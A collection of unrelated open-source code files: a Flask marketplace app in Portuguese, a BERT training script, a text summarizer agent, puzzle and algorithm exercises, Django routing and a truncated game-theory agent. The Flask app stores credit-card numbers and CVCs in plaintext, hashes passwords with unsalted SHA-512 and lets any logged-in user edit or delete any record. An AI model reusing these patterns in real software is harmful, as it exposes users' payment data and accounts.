methods=['POST'])\ndef criarusuario():\n hash = hashlib.sha512(str(request.form.get('passwd')).encode(\"utf-8\")).hexdigest()\n usuario = Usuario(request.form.get('user'), request.form.get('nome'), request.form.get('email'), hash, request.form.get('telefone'), request.form.get('rua'), request.form.get('numero'), request.form.get('bairro'), request.form.get('cidade'), request.form.get('estado'), request.form.get('cep'))\n db.session.add(usuario)\n 
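# NOTE: unsalted sha512 (as used above) is weak for password storage; werkzeug.security.generate_password_hash would be a safer drop-in (a hypothetical swap, not used elsewhere in this app)\n    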
db.session.commit() \n    return redirect(url_for('usuario'))\n\n@app.route(\"/usuario/detalhar/<int:id>\")\n@login_required\ndef buscarusuario(id):\n    usuario = Usuario.query.get(id)\n    return usuario.nome\n\n@app.route(\"/usuario/editar/<int:id>\", methods=['GET','POST'])\n@login_required\ndef editarusuario(id):\n    usuario = Usuario.query.get(id)  # fetch the user being edited (was missing, causing a NameError)\n    if request.method == 'POST':\n        usuario.username = request.form.get('user')\n        usuario.nome = request.form.get('nome')\n        usuario.email = request.form.get('email')\n        usuario.senha = hashlib.sha512(str(request.form.get('passwd')).encode(\"utf-8\")).hexdigest()\n        usuario.rua = request.form.get('rua')\n        usuario.numero = request.form.get('numero')\n        usuario.bairro = request.form.get('bairro')\n        usuario.cidade = request.form.get('cidade')\n        usuario.estado = request.form.get('estado')\n        usuario.cep = request.form.get('cep')\n        db.session.add(usuario)\n        db.session.commit()\n        return redirect(url_for('usuario'))\n    return render_template('eusuario.html', usuario = usuario, titulo=\"Usuario\")\n\n@app.route(\"/usuario/deletar/<int:id>\")\n@login_required\ndef deletarusuario(id):\n    usuario = Usuario.query.get(id)\n    db.session.delete(usuario)\n    db.session.commit()\n    return redirect(url_for('usuario')) \n\n@app.route(\"/relatorios/vendas\")\n@login_required\ndef relvendas():\n    usuario_id = current_user.id\n    vendas = Compra.query.filter_by(vendedor_id=usuario_id).all()\n    return render_template('relvendas.html', vendas=vendas, titulo=\"Relatório de Vendas\")\n\n@app.route(\"/relatorios/compras\")\n@login_required\ndef relcompras():\n    usuario_id = current_user.id\n    compras = Compra.query.filter_by(comprador_id=usuario_id).all()\n    return render_template('relcompras.html', compras=compras, titulo=\"Relatório de Compras\")\n\n@app.route(\"/cartao\")\n@login_required\ndef cartao():\n    usuario_id = current_user.id\n    cartoes = Cartao.query.filter_by(usuario_id=usuario_id).all()\n    return render_template('cartao.html', cartoes = cartoes, titulo=\"Cartão de Crédito\")\n\n@app.route(\"/cartao/criar\", methods=['POST'])\n@login_required\ndef novocartao():\n    usuario_id = current_user.id\n    cartao = Cartao(request.form.get('num_cartao'), request.form.get('nome_cartao'), request.form.get('month'), request.form.get('year'), request.form.get('cvc'), usuario_id=usuario_id)\n    db.session.add(cartao)\n    db.session.commit() \n    return redirect(url_for('cartao'))\n\n@app.route(\"/cartao/detalhar/<int:id>\")\n@login_required\ndef buscarcartao(id):\n    cartao = Cartao.query.get(id)\n    return cartao.num_cartao\n\n@app.route(\"/cartao/editar/<int:id>\", methods=['GET','POST'])\n@login_required\ndef editarcartao(id):\n    cartao = Cartao.query.get(id)\n    if request.method == 'POST':\n        usuario_id = current_user.id\n        cartao.num_cartao = request.form.get('num_cartao')\n        cartao.nome_cartao = request.form.get('nome_cartao')\n        cartao.month = request.form.get('month')\n        cartao.year = request.form.get('year')\n        cartao.cvc = request.form.get('cvc')\n        cartao.usuario_id = usuario_id\n        db.session.add(cartao)\n        db.session.commit()\n        return redirect(url_for('cartao'))\n    return render_template('ecartao.html', cartao = cartao, titulo=\"Cartao\")\n\n@app.route(\"/cartao/deletar/<int:id>\")\n@login_required\ndef deletarcartao(id):\n    cartao = Cartao.query.get(id)\n    db.session.delete(cartao)\n    db.session.commit()\n    return redirect(url_for('cartao')) \n\n@app.route(\"/categoria\")\n@login_required\ndef categoria():\n    return render_template('categoria.html', categorias = Categoria.query.all(), titulo='Categoria')\n\n@app.route(\"/categoria/criar\", methods=['POST'])\n@login_required\ndef criarcategoria():\n    
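# Create a new category from the submitted form fields, then return to the category list.\n    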
categoria = Categoria(request.form.get('nome'), request.form.get('desc'))\n    db.session.add(categoria)\n    db.session.commit()\n    return redirect(url_for('categoria'))\n\n@app.route(\"/categoria/detalhar/<int:id>\")\n@login_required\ndef buscarcategoria(id):\n    categoria = Categoria.query.get(id)\n    return categoria.nome\n\n@app.route(\"/categoria/editar/<int:id>\", methods=['GET','POST'])\n@login_required\ndef editarcategoria(id):\n    categoria = Categoria.query.get(id)\n    if request.method == 'POST':\n        categoria.nome = request.form.get('nome')\n        categoria.desc = request.form.get('desc')\n        db.session.add(categoria)\n        db.session.commit()\n        return redirect(url_for('categoria'))\n    return render_template('ecategoria.html', categoria = categoria, titulo=\"Categoria\")\n\n@app.route(\"/categoria/deletar/<int:id>\")\n@login_required\ndef deletarcategoria(id):\n    categoria = Categoria.query.get(id)\n    db.session.delete(categoria)\n    db.session.commit()\n    return redirect(url_for('categoria')) \n\n@app.route(\"/produtos\")\n@login_required\ndef produto():\n    usu_id = current_user.id\n    produtos = Produto.query.filter_by(usu_id=usu_id).all()\n    return render_template('produtos.html', produtos = produtos, categorias = Categoria.query.all(), titulo=\"Produtos\")\n\n@app.route(\"/produtos/criar\", methods=['POST'])\n@login_required\ndef criarproduto():\n    usuario_id = current_user.id\n    produto = Produto(request.form.get('nome'), request.form.get('desc'), request.form.get('espec'), request.form.get('marca'), request.form.get('modelo'), request.form.get('qtd'),request.form.get('preco'),request.form.get('cat'),usu_id=usuario_id)\n    db.session.add(produto)\n    db.session.commit()\n    return redirect(url_for('produto'))\n\n@app.route(\"/produtos/detalhar/<int:id>\")\n@login_required\ndef buscarproduto(id):\n    produto = Produto.query.get(id)\n    return produto.prod_nome  # was Produto.nome, which is not an attribute of the class\n\n@app.route(\"/produtos/editar/<int:id>\", methods=['GET','POST'])\n@login_required\ndef editarproduto(id):\n    produto = Produto.query.get(id)\n    if request.method == 'POST':\n        usuario_id = current_user.id\n        produto.prod_nome = request.form.get('nome')\n        produto.prod_desc = request.form.get('desc')\n        produto.prod_espec = request.form.get('espec')\n        produto.prod_marca = request.form.get('marca')\n        produto.prod_modelo = request.form.get('modelo')\n        produto.prod_qtd = request.form.get('qtd')\n        produto.prod_preco = request.form.get('preco')\n        produto.cat_id = request.form.get('cat')\n        produto.usu_id = usuario_id\n        db.session.add(produto)\n        db.session.commit()\n        return redirect(url_for('produto'))\n    return render_template('eprodutos.html', categorias = Categoria.query.all(), usuarios = Usuario.query.all(), produto = produto, titulo=\"Produto\")\n\n@app.route(\"/produtos/deletar/<int:id>\")\n@login_required\ndef deletarproduto(id):\n    produto = Produto.query.get(id)\n    db.session.delete(produto)\n    db.session.commit()\n    return redirect(url_for('produto'))\n\n@app.route(\"/produtos/comprar\")\ndef produtos_anunciados():\n    return render_template('produtos_anunciados.html', produtos = Produto.query.all(), categorias = Categoria.query.all(), usuarios = Usuario.query.all(), titulo=\"Produtos\")\n\n@app.route(\"/produtos/favoritos\")\n@login_required\ndef favoritos():\n    usuario_id = current_user.id\n    favoritos = Favorito.query.filter_by(usuario_id=usuario_id).all()\n    return render_template('favoritos.html', favoritos=favoritos, titulo=\"Produtos Favoritados\")\n\n@app.route(\"/favoritar/<int:id>\", methods=['POST'])\n@login_required\ndef favoritar(id):\n    usuario_id = current_user.id\n    favorito_existente = 
Favorito.query.filter_by(usuario_id=usuario_id, produto_id=id).first()\n    if favorito_existente:\n        print(\"Este produto já foi favoritado por você.\")\n    else:\n        favorito = Favorito(usuario_id=usuario_id, produto_id=id)\n        db.session.add(favorito)\n        db.session.commit()\n    return redirect(url_for('produtos_anunciados'))\n\n@app.route(\"/remover_favorito/<int:id>\", methods=['POST'])\n@login_required\ndef remover_favorito(id):\n    usuario_id = current_user.id\n    favorito = Favorito.query.filter_by(usuario_id=usuario_id, produto_id=id).first()\n    if favorito:\n        db.session.delete(favorito)\n        db.session.commit()\n    return redirect(url_for('favoritos'))\n\n@app.route(\"/escolher_compra/<int:produto_id>\", methods=['GET', 'POST'])\n@login_required\ndef escolher_compra(produto_id):\n    produto = Produto.query.get(produto_id)\n    if request.method == 'POST':\n        quantidade = int(request.form.get('quantidade'))\n        cartao_id = request.form.get('cartao_id')\n        comprador_id = current_user.id\n        vendedor_id = produto.usu_id\n        compra = Compra(produto_id=produto_id, vendedor_id=vendedor_id, comprador_id=comprador_id, cartao_id=cartao_id, quantidade=quantidade)\n        db.session.add(compra)\n        db.session.commit()\n        return redirect (url_for('produtos_anunciados'))\n    return render_template('escolher_compra.html', produto=produto, cartoes=Cartao.query.filter_by(usuario_id=current_user.id).all())\n\n@app.route(\"/realizar_pergunta/<int:produto_id>\", methods=['GET', 'POST'])\ndef realizar_pergunta(produto_id):\n    produto = Produto.query.get(produto_id)\n    if request.method == 'POST':\n        texto_pergunta = request.form.get('texto_pergunta')\n        pergunta = Pergunta(produto_id=produto_id, texto=texto_pergunta)\n        db.session.add(pergunta)\n        db.session.commit()\n    perguntas = Pergunta.query.filter_by(produto_id=produto_id).all()\n    return render_template('perguntas.html', produto=produto, perguntas=perguntas, titulo=\"Realizar Pergunta\")\n\n@app.route(\"/responder_perguntas/<int:produto_id>\", methods=['GET', 'POST'])\n@login_required\ndef responder_perguntas(produto_id):\n    produto = Produto.query.get(produto_id)\n    perguntas = Pergunta.query.filter_by(produto_id=produto_id).all()\n    if request.method == 'POST':\n        pergunta_id = int(request.form.get('pergunta_id'))\n        texto_resposta = request.form.get('texto_resposta')\n        resposta = Resposta(pergunta_id=pergunta_id, texto=texto_resposta)\n        db.session.add(resposta)\n        db.session.commit()\n    return render_template('respostas.html', produto=produto, perguntas=perguntas, titulo=\"Responder Perguntas\")\n\n@app.route(\"/sobre\")\ndef sobre():\n    return render_template('sobre.html', titulo=\"Sobre Nós\")\n\n@app.route(\"/contato\")\ndef contato():\n    return render_template('contato.html', titulo=\"Contato\")\n\nif __name__ == '__main__':  # was 'Offer', a guard that never fires when run as a script; '__main__' is the standard check\n    with app.app_context():\n        db.create_all()\n    app.run(debug=True)  # assumed entry point: start the dev server after creating the tables\n","repo_name":"amshinohara/OfferUp","sub_path":"Offer.py","file_name":"Offer.py","file_ext":"py","file_size_in_byte":19287,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70962520749","text":"import os\nfrom utils import *\nimport numpy as np\nimport argparse\nimport torch  # used directly below; added in case utils does not re-export it\nimport pandas as pd  # used by evaluate() to write predictions\nfrom itertools import product\nfrom sklearn.metrics import roc_auc_score\nfrom torch.utils.data import DataLoader, Subset\n\ndef main(args):\n    torch.manual_seed(0)\n    np.random.seed(0)\n    \n    logfile = \"logs/runs.txt\"\n    slurm_job_id = None\n    if 'SLURM_JOBID' in os.environ:\n        slurm_job_id = os.environ['SLURM_JOBID']\n        logfile = f\"logs/slurm_{slurm_job_id}.txt\"\n    print(\"Storing results in logfile\", logfile)\n\n    if not os.path.exists(os.path.dirname(logfile)):\n        
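# Create the log directory on first run; os.makedirs(..., exist_ok=True) would also cover nested paths.\n        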
os.mkdir(os.path.dirname(logfile))\n\n with open(logfile, \"a+\") as f:\n f.write('{}\\n'.format(args))\n data_dir = os.path.abspath(args.data_dir)\n for run in range(args.nruns):\n model, optimizer = load_model(args)\n\n train_data = load_process_data(args, data_dir, \"train\")\n test_data = load_process_data(args, data_dir, \"test\")\n print(len(train_data), len(test_data))\n\n train_dataloader = DataLoader(train_data, batch_size=args.batch_size, shuffle=True)\n test_dataloader = DataLoader(test_data, batch_size=args.batch_size, shuffle=False)\n\n for epoch in range(1, args.nepochs + 1):\n print()\n train(model, optimizer, train_dataloader, epoch, gradient_acc_steps=args.gradient_acc_steps)\n print('\\nRunning evaluation on test...')\n evaluate(model, test_dataloader, outfile=f\"logs/{slurm_job_id if slurm_job_id else ''}predictions.csv\")\n\n if args.save:\n save_path = \"cm_{}_{}_{}_{}.pkl\".format(args.model, args.learning_rate, args.batch_size, args.nepochs)\n print(\"SAVING to\", save_path)\n torch.save(model.module.state_dict(), save_path)\n return\n\ndef train(model, optimizer, train_dataloader, epoch, log_interval=10, gradient_acc_steps=1):\n # Set model to training mode\n model.train()\n\n criterion = torch.nn.BCEWithLogitsLoss()\n\n # Loop over each batch from the training set\n log_interval = max(int(len(train_dataloader) / 100), 1)\n print(f\"Training for {len(train_dataloader)} steps\", flush=True)\n if args.verbose:\n print(\"Logging every\", log_interval, \"steps\", flush=True)\n total_loss = 0\n total_items = 0\n correct = 0\n for step, batch in enumerate(train_dataloader):\n\n # Copy data to GPU if needed\n batch = tuple(t.cuda() for t in batch)\n\n # Unpack the inputs from our dataloader\n b_input_ids, b_input_mask, b_labels = batch\n\n # Forward pass\n output = model(b_input_ids, attention_mask=b_input_mask)[0].squeeze(-1)\n loss = criterion(output, b_labels.float()) / gradient_acc_steps\n\n # Backward pass\n loss.backward()\n \n total_loss += loss.item()*b_input_ids.size(0)\n total_items += b_input_ids.size(0)\n\n # For logging\n output = output.detach().cpu().numpy()\n predictions = (output > 0).astype(int)\n b_labels = b_labels.detach().cpu().numpy()\n correct += (predictions == b_labels).sum()\n\n if (step % gradient_acc_steps == 0) or (step + 1 == len(train_dataloader)):\n # Update weights\n optimizer.step()\n\n # Zero gradient buffers\n optimizer.zero_grad()\n\n if step % log_interval == 0 and args.verbose:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tRunning Loss: {:.6f}'.format(\n epoch, step * len(b_input_ids),\n len(train_dataloader.dataset),\n 100. 
* step / len(train_dataloader), total_loss / total_items), flush=True)\n \n acc = correct / total_items\n print(f\"Train Epoch: {epoch} \\tAvg Loss: {total_loss / total_items} \\tAcc: {acc}\")\n\n\ndef evaluate(model, dataloader, outfile=None):\n model.eval()\n correct = 0\n total = 0\n\n all_logits = []\n for batch in dataloader:\n batch = tuple(t.cuda() for t in batch)\n b_input_ids, b_input_mask, b_labels = batch\n\n with torch.no_grad():\n logits = model(b_input_ids, attention_mask=b_input_mask)[0]\n output = logits.squeeze(-1).detach().cpu().numpy()\n predictions = (output > 0).astype(int)\n\n b_labels = b_labels.detach().cpu().numpy()\n \n all_logits += list(output)\n\n for pred, label in zip(predictions, b_labels):\n if label == 0.5: # Don't evaluate ambiguous\n continue\n if pred == label:\n correct += 1\n total += 1\n \n scores = torch.sigmoid(torch.tensor(all_logits)) # Convert output logits to 0-1 scores\n out_class = scores > 0.5 # Binary classification\n out_uncertainty = np.minimum(scores, 1 - scores) # Uncertainty score is just how close we are to 0.5\n\n # Write out predictions\n if outfile:\n pd.DataFrame({\n 'class': out_class,\n 'uncertainty': out_uncertainty,\n }).to_csv(outfile, index=False)\n print(f\"Saved predictions to {outfile}\")\n\n if total > 0:\n acc = correct / total\n print(f'Accuracy: {acc:.4f} (on {total} non-ambig examples)')\n return acc\n return None\n\ndef get_probs(model, dataloader, no_labels=False):\n model.eval()\n\n all_probs = []\n for batch in dataloader:\n batch = tuple(t.cuda() for t in batch)\n if not no_labels:\n b_input_ids, b_input_mask, b_labels = batch\n else:\n b_input_ids, b_input_mask = batch # no labels\n\n with torch.no_grad():\n logits = model(b_input_ids, attention_mask=b_input_mask)[0]\n\n probs = torch.sigmoid(logits).squeeze(-1).detach().cpu().numpy()\n all_probs.append(probs)\n\n probs = np.concatenate(all_probs)\n return probs\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--model\", \"-m\", type=str, default=\"bert-base-uncased\")\n parser.add_argument(\"--ngpus\", \"-n\", type=int, default=2)\n parser.add_argument(\"--nepochs\", \"-e\", type=int, default=2)\n parser.add_argument(\"--batch_size\", \"-b\", type=int, default=16)\n parser.add_argument(\"--gradient_acc_steps\", \"-a\", type=int, default=1)\n parser.add_argument(\"--max_length\", \"-t\", type=int, default=512)\n parser.add_argument(\"--weight_decay\", \"-w\", type=float, default=0.01)\n parser.add_argument(\"--learning_rate\", \"-l\", type=float, default=2e-5)\n parser.add_argument(\"--verbose\", \"-v\", action=\"store_true\")\n parser.add_argument(\"--nruns\", \"-r\", type=int, default=1)\n parser.add_argument(\"--save\", \"-s\", action=\"store_true\")\n parser.add_argument(\"--data_dir\", \"-d\", type=str, default=\"./dataset\")\n args = parser.parse_args()\n\n main(args)\n\n","repo_name":"JunShern/moral-uncertainty","sub_path":"baselines/tune.py","file_name":"tune.py","file_ext":"py","file_size_in_byte":6651,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"10381178941","text":"import re\nfrom agents.IAgent import AgentData\nfrom agents.ITask import Task\nimport spacy\nfrom spacy.lang.en.stop_words import STOP_WORDS\nfrom string import punctuation\nfrom heapq import nlargest\n\n\nclass ResultSummarizerAgent:\n def __init__(self):\n self.nlp = spacy.load('en_core_web_sm')\n pass\n\n def summarize_text(self, text, num_sentences=10, chunk_size=1000000):\n 
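# Frequency-based extractive summarization: score each sentence by the\n        # normalized frequencies of its non-stopword tokens, then keep the top\n        # num_sentences sentences from each chunk (chunking keeps every spaCy doc\n        # under the default max_length limit). A minimal usage sketch with a\n        # hypothetical file name:\n        #   ResultSummarizerAgent().summarize_text(open('report.txt').read(), num_sentences=5)\n        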
summaries = []\n        for i in range(0, len(text), chunk_size):\n            chunk = text[i:i+chunk_size]\n            doc = self.nlp(chunk)\n            stopwords = list(STOP_WORDS)\n            word_frequencies = {}\n            for word in doc:\n                if word.text.lower() not in stopwords:\n                    if word.text.lower() not in punctuation:\n                        if word.text not in word_frequencies.keys():\n                            word_frequencies[word.text] = 1\n                        else:\n                            word_frequencies[word.text] += 1\n\n            max_frequency = max(word_frequencies.values())\n            for word in word_frequencies.keys():\n                word_frequencies[word] = (word_frequencies[word]/max_frequency)\n\n            sentence_tokens = [sent for sent in doc.sents]\n            sentence_scores = {}\n            for sent in sentence_tokens:\n                for word in sent:\n                    if word.text.lower() in word_frequencies.keys():\n                        if sent not in sentence_scores.keys():\n                            sentence_scores[sent] = word_frequencies[word.text.lower()]\n                        else:\n                            sentence_scores[sent] += word_frequencies[word.text.lower()]\n\n            summary_sentences = nlargest(num_sentences, sentence_scores, key=sentence_scores.get)\n            final_sentences = [w.text for w in summary_sentences]\n            summary = ' '.join(final_sentences)\n            \n            # Limit each chunk's summary to a maximum of 6000 characters\n            if len(summary) > 6000:\n                summary = summary[:6000] + '...'\n            \n            summaries.append(summary)\n        \n        return ' '.join(summaries)\n    \n    def summarize(self, task: Task, agent: AgentData):\n        result = self.summarize_text(task.result, 10)\n\n        prompt = f\"\"\"Please rewrite this base text: {result} so that it is cleaner and easier to understand.\n        Include relevant information, interesting URL (https:... etc) and examples that support the following task at hand: {task.description}.\n        Provide extensive information, and feel free to include as many particulars as possible.\n\n        Note: judge the relevance of the BASE TEXT (return \"Grade: ?/10\", 0 would be an error in the data), please be strict while assessing the quality of the base text in relation to the task.\n        \"\"\"\n\n        response = agent.open_ai.generate_text(prompt, 0.1)\n\n        agent.logger.log(f\"Task Summary: {response}\")\n        return response","repo_name":"mtrsklnkvMM/babygpt","sub_path":"agents/result_summarizer_agent.py","file_name":"result_summarizer_agent.py","file_ext":"py","file_size_in_byte":2968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31107413841","text":"import re\n\ndata = list(open(\"2015-9-data\").readlines())\n\nlineParser = re.compile(r\"(\\w+) to (\\w+) = ([0-9]+)\")\n\npaths = dict()\ndists = dict()\n\ntests = [\n    \"London to Dublin = 464\",\n    \"London to Belfast = 518\",\n    \"Dublin to Belfast = 141\"\n]\n\nfor line in data:\n    matches = lineParser.findall(line)[0]\n    cityFrom = matches[0]\n    cityTo = matches[1]\n    distance = int(matches[2])\n\n    if cityFrom not in dists.keys():\n        dists[cityFrom] = dict()\n    if cityTo not in dists.keys():\n        dists[cityTo] = dict()\n\n    dists[cityFrom][cityTo] = distance\n    dists[cityTo][cityFrom] = distance\n\n    paths[(cityFrom, cityTo)] = distance\n    paths[(cityTo, cityFrom)] = distance\n\n\n\ndef fournish(paths):\n    newPaths = paths.copy()\n    for path in paths.keys():\n        reference = path[len(path) - 1]\n        for nextStep in dists[reference]:\n            if nextStep in path:\n                continue\n            newPaths[path + (nextStep,)] = paths[path] + dists[reference][nextStep]\n            newPaths[(nextStep,) + path[::-1]] = paths[path] + dists[reference][nextStep]\n    return newPaths\n\nprev = dict()\nwhile prev != paths:\n    prev = paths\n    paths = fournish(paths)\n\nprint(min([paths[key] for key in paths.keys() if len(key) == len(dists.keys())]))\nprint(max([paths[key] for 
key in paths.keys() if len(key) == len(dists.keys())]))\n","repo_name":"alexandreLBarrett/AoC","sub_path":"2015/2015-9.py","file_name":"2015-9.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24339042805","text":"# 李禄波\n# 2021/2/4 4:34 PM\n\nimport time\nimport multiprocessing\nimport os\n\n\ndef dance():\n    # Get the child process id\n    print(\"子进程 my_dance id:\", os.getpid())\n    # Get the parent process id\n    print(\"dance父进程:\", os.getppid())\n    # Get the process name\n    print(\"dance的进程名是:\", multiprocessing.current_process())\n    for i in range(5):\n\n        time.sleep(1)\n        print(\"dance\", i)\n\n\ndef sing():\n    # Get the child process id\n    print(\"子进程 my_sing id:\", os.getpid())\n    # Get the parent process id\n    print(\"sing父进程:\", os.getppid())\n    # Get the process name\n    print(\"sing的进程名是:\", multiprocessing.current_process())\n    for i in range(5):\n\n        time.sleep(1)\n        print(\"sing\", i)\n\n\nif __name__ == \"__main__\":\n    # Single process: takes ten seconds to finish\n    # There is at least one process, and that process contains at least one thread\n    # dance()\n    # sing()\n\n    # Get the main process id\n    print(\"主进程id:\", os.getpid())\n\n    # Multiprocessing: takes five seconds to finish\n    # Three processes: 1 main process plus two child processes\n    # Three threads: one thread inside each process\n    # Create the child processes\n    # Process:\n    # target: the task (function name) to run\n    # name: the name of the child process\n    my_dance = multiprocessing.Process(target=dance, name=\"dance\")\n    my_sing = multiprocessing.Process(target=sing)\n\n    # Start the child processes (they do not run until started)\n    my_dance.start()\n    my_sing.start()\n","repo_name":"coderlubo/Web_base","sub_path":"01_多任务编程/01_多进程(重点).py","file_name":"01_多进程(重点).py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1066862893","text":"lis=list()\nc=0\nlis.append(str(input('digite um número')))\nres=str(input('Quer continuar: S/N')).upper()\nc=c+1\nwhile res=='S':\n    lis.append(str(input('digite um número')))\n    res = str(input('Quer continuar: S/N')).upper()\n    c=c+1\n    if res =='N':\n        break\nlis.sort(reverse=True)\nprint (f'A quantidade de números digitados foi {c}')\nprint (f'A lista digitada de forma decrescente é {lis}')\nif '5' in lis:\n    print ('o numero 5 está na lista')\nelse:\n    print ('O numero 5 não está na lista')\n\n","repo_name":"abinoamenezes/CursoEmVideo","sub_path":"ex31.py","file_name":"ex31.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20478777137","text":"\nfrom queue import PriorityQueue\nv = 20\ngraph = [[] for i in range(v)]\n \n# Function implementing best-first search\n# It prints an output route with the lowest cost\n \n \ndef best_first_search(source, target, n):\n    visited = [0] * n\n    visited[source] = True  # mark the start node as visited (was hard-coded to index 0)\n    pq = PriorityQueue()\n    pq.put((0, source))\n    while pq.empty() == False:\n        u = pq.get()[1]\n        # Displaying the path having lowest cost\n        print(u, end=\" \")\n        if u == target:\n            break\n \n        for v, c in graph[u]:\n            if visited[v] == False:\n                visited[v] = True\n                pq.put((c, v))\n    print()\n \n# Function to add edges to the graph\n \n \ndef addedge(x, y, cost):\n    graph[x].append((y, cost))\n    graph[y].append((x, cost))\n \n \n\n# implemented by adding integer edges (x, y, cost);\naddedge(0, 1, 3)\naddedge(0, 2, 6)\naddedge(0, 3, 5)\naddedge(1, 4, 9)\naddedge(1, 5, 8)\naddedge(2, 6, 12)\naddedge(2, 7, 14)\naddedge(3, 8, 7)\naddedge(8, 9, 5)\naddedge(8, 10, 6)\naddedge(9, 11, 1)\naddedge(9, 12, 10)\naddedge(9, 13, 2)\naddedge(10, 14, 1)\naddedge(10, 15, 12)\naddedge(16, 17, 18)\n\n#source is the node number to start from, and target the node to finish at\n#(If there is no route that leads to the 
final result, it ends at the last one)\nsource = 0\ntarget = 14\nbest_first_search(source, target, v)\n \n# The original code was written by Jyotheeswar Ganne and we modified it\n","repo_name":"zMaylox/Practicas-oficiales","sub_path":"3.7 best-first search.py","file_name":"3.7 best-first search.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6599937502","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom django.conf.urls import handler404, handler500, handler400\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\n\nurlpatterns = [\n    path('', include('app.urls')),\n    path('accounts/', include('accounts.urls')),\n    path('finance/', include('finance.urls')),\n    path('library/', include('library.urls')),\n    path('programs/', include('course.urls')),\n    path('result/', include('result.urls')),\n    path('search/', include('search.urls')),\n    path('quiz/', include('quiz.urls')),\n    path('cal/', include('cal.urls')),\n    path('fold/', include('folder.urls', namespace='main')),\n    path('folder/', include('folder.urls', namespace='folder')),\n    path('file/', include('file.urls', namespace='file')),\n    # path('payments/', include('payments.urls')),\n    # path('calendar/', include('cal.urls')),\n    path('accounts/api/', include('accounts.api.urls', namespace='accounts-api')),\n    path('bulksms/', include('bulksms.urls')),\n    path('admin/', admin.site.urls),\n]\nif settings.DEBUG:\n    urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n    urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\n# handler404 = 'app.views.handler404'\n# handler500 = 'app.views.handler500'\n# handler400 = 'app.views.handler400'\n\n\n\n","repo_name":"roberwangunda/django-lms","sub_path":"SMS/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72379826667","text":"import dataclasses\nfrom typing import Any, Callable, Dict, List, Optional, Sequence, Tuple\n\nimport haiku as hk\nimport jax\nimport jax.numpy as jnp\nimport numpy as np\nimport optax\n\nfrom open_spiel.python import rl_agent\nfrom open_spiel.python import rl_agent_policy\nfrom open_spiel.python import rl_environment\nfrom open_spiel.python.mfg.algorithms import distribution\nimport pyspiel\nfrom open_spiel.python.utils import reservoir_buffer\nfrom open_spiel.python.utils import training\n\n\n@dataclasses.dataclass\nclass Transition:\n  \"\"\"Transitions stored in the reservoir buffer.\"\"\"\n  info_state: np.ndarray\n  action_probs: np.ndarray\n  legal_actions_mask: np.ndarray\n\n\nclass AveragePolicy(rl_agent.AbstractAgent):\n  \"\"\"NFSP-like agent that learns an average policy using a single network.\"\"\"\n\n  def __init__(self,\n               player_id: int,\n               br_rl_agent: rl_agent.AbstractAgent,\n               state_representation_size: int,\n               num_actions: int,\n               hidden_layers_sizes: List[int],\n               params_avg_network: Optional[jnp.ndarray] = None,\n               reservoir_buffer_capacity: int = 100000,\n               batch_size: int = 128,\n               learning_rate: float = 0.01,\n               min_buffer_size_to_learn: int = 1000,\n               optimizer_str: str = 'sgd',\n               gradient_clipping: Optional[float] = None,\n               seed: int = 42,\n               tau: float = 1.0):\n    \"\"\"Initialize the AveragePolicy agent.\"\"\"\n    self._br_rl_agent = br_rl_agent\n    self._player_id = player_id\n    self._num_actions = num_actions\n    self._batch_size = 
batch_size\n self._min_buffer_size_to_learn = min_buffer_size_to_learn\n\n self._reservoir_buffer = reservoir_buffer.ReservoirBuffer(\n reservoir_buffer_capacity)\n\n # Keep track of the last training loss achieved in an update step.\n self._last_loss_value = None\n\n # Average policy network.\n def network(x):\n mlp = hk.nets.MLP(hidden_layers_sizes + [num_actions])\n return mlp(x)\n\n self.avg_network = hk.without_apply_rng(hk.transform(network))\n\n def avg_network_policy(param, info_state):\n action_values = self.avg_network.apply(param, info_state)\n return jax.nn.softmax(action_values / tau, axis=1)\n\n self._avg_network_policy = jax.jit(avg_network_policy)\n\n rng = jax.random.PRNGKey(seed)\n x = jnp.ones([1, state_representation_size])\n # Use the specified parameters if any, or initialize the network with random\n # weights.\n if params_avg_network is None:\n self._params_avg_network = self.avg_network.init(rng, x)\n else:\n self._params_avg_network = jax.tree_map(lambda x: x.copy(),\n params_avg_network)\n self._params_avg_network = jax.device_put(self._params_avg_network)\n\n if optimizer_str == 'adam':\n optimizer = optax.adam(learning_rate)\n elif optimizer_str == 'sgd':\n optimizer = optax.sgd(learning_rate)\n else:\n raise ValueError('Not implemented, choose from \"adam\" and \"sgd\".')\n\n if gradient_clipping:\n optimizer = optax.chain(optimizer,\n optax.clip_by_global_norm(gradient_clipping))\n\n opt_init, opt_update = optimizer.init, optimizer.update\n\n def opt_update_fn(params, opt_state, gradient):\n \"\"\"Learning rule (stochastic gradient descent).\"\"\"\n updates, opt_state = opt_update(gradient, opt_state)\n new_params = optax.apply_updates(params, updates)\n return new_params, opt_state\n\n self._opt_update_fn = opt_update_fn\n self._opt_state = opt_init(self._params_avg_network)\n self._loss_and_grad = jax.value_and_grad(self._loss_avg, has_aux=False)\n\n self._jit_update = jax.jit(self._get_update_fn())\n\n def _get_update_fn(self):\n \"\"\"Returns the function that updates the parameters.\"\"\"\n\n def update(param_avg, opt_state_avg, info_states, action_probs):\n loss_val, grad_val = self._loss_and_grad(param_avg, info_states,\n action_probs)\n new_param_avg, new_opt_state_avg = self._opt_update_fn(\n param_avg, 